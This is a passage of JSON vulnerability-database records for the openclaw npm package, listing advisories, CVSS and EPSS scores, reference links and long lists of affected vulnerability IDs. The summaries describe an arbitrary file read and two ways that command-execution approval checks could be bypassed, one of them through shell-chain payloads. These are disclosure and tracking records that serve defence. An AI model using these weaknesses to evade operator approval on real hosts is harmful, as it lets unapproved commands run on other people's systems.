reads`).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41363","reference_id":"","reference_type":"","scores":[{"value":"0.00058","scoring_system":"epss","scoring_elements":"0.18387","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00058","scoring_system":"epss","scoring_elements":"0.18424","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00058","scoring_system":"epss","scoring_elements":"0.18421","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41363"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/764394c78b6c22c5b53c3cd132d27ff36340bf45","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/764394c78b6c22c5b53c3cd132d27ff36340bf45"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qf48-qfv4-jjm9","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:N
/VA:N/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-28T15:01:12Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-qf48-qfv4-jjm9"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41363","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41363"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-file-read-via-feishu-upload-image-parameter","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-28T15:01:12Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-file-read-via-feishu-upload-image-parameter"},{"reference_url":"https://github.com/advisories/GHSA-qf48-qfv4-jjm9","reference_id":"GHSA-qf48-qfv4-jjm9","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/adv
isories/GHSA-qf48-qfv4-jjm9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-m
t9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-s
w1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-h
hkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-41363","GHSA-qf48-qfv4-jjm9"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qjvc-etb4-qbfv"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91672?format=json","vulnerability_id":"VCID-qquc-rw1d-m7ec","summary":"Duplicate Advisory: OpenClaw macOS companion app (beta): allowlist parsing mismatch for system.run shell chains\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-5f9p-f3w2-fwch. This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw versions prior to 2026.2.22 contain an allowlist parsing mismatch vulnerability in the macOS companion app that allows authenticated operators to bypass exec approval checks. 
Attackers with operator.write privileges and a paired macOS beta node can craft shell-chain payloads that pass incomplete allowlist validation and execute arbitrary commands on the paired host.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/5da03e622119fa012285cdb590fcf4264c965cb5","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:H/A:L"},{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:H/UI:A/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/5da03e622119fa012285cdb590fcf4264c965cb5"},{"reference_url":"https://github.com/openclaw/openclaw/commit/e371da38aab99521c4e076cd3d95fd775e00b784","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:H/A:L"},{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:H/UI:A/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/e371da38aab99521c4e076cd3d95fd775e00b784"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-allowlist-parsing-mismatch-in-system-run-shell-chains","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:H/A:L"},{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:H/UI:A/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/
MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-allowlist-parsing-mismatch-in-system-run-shell-chains"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31993","reference_id":"CVE-2026-31993","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:H/A:L"},{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:H/UI:A/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31993"},{"reference_url":"https://github.com/advisories/GHSA-5326-6f73-m96w","reference_id":"GHSA-5326-6f73-m96w","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-5326-6f73-m96w"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5f9p-f3w2-fwch","reference_id":"GHSA-5f9p-f3w2-fwch","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:H/A:L"},{"value":"5.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:H/UI:A/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5f9p-f3w2-fwch"}],"fixed_packages":[],"aliases":["GHSA-5326-6f73-m96w"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabiliti
es/VCID-qquc-rw1d-m7ec"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90800?format=json","vulnerability_id":"VCID-qr66-xgea-tufh","summary":"OpenClaw: Node-host approvals could show misleading shell payloads instead of the executed argv\n## Summary\nIn affected versions of `openclaw`, node-host `system.run` approvals could display only an extracted shell payload such as `jq --version` while execution still ran a different outer wrapper argv such as `./env sh -c 'jq --version'`.\n\n## Impact\nThis is an approval-integrity bug. An attacker who could place or select a local wrapper binary and induce a wrapper-shaped command could get local code executed after the operator approved misleading command text.\n\n## Affected Packages and Versions\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.3.8`\n- Fixed in: `2026.3.11`\n\n## Technical Details\nWrapper resolution normalized executables by basename and extracted inner shell payload text for approval display, while execution still preserved the full wrapper argv. Approval storage and UI therefore showed text that did not match the exact command OpenClaw would execute.\n\n## Fix\nOpenClaw now binds approvals to the exact executed argv and keeps extracted shell payload text only as secondary preview data. 
The fix shipped in `openclaw@2026.3.11`.\n\n## Workarounds\nUpgrade to `2026.3.11` or later.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32971","reference_id":"","reference_type":"","scores":[{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.05075","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.0506","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.06165","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32971"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rw39-5899-8mxp","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-31T14:57:53Z/"}],"url":"http
s://github.com/openclaw/openclaw/security/advisories/GHSA-rw39-5899-8mxp"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32971","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32971"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-node-host-approval-ui-mismatch-allows-execution-of-unintended-commands","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-31T14:57:53Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-node-host-approval-ui-mismatch-allows-execution-of-unintended-commands"},{"reference_url":"https://github.com/advisories/GHSA-rw39-5899-8mxp","reference_id":"GHSA-rw39-5899-8mxp","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rw39-5899-8mxp"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74883?format=json","purl":"pkg:npm/openclaw@2026.3.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VC
ID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VC
ID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VC
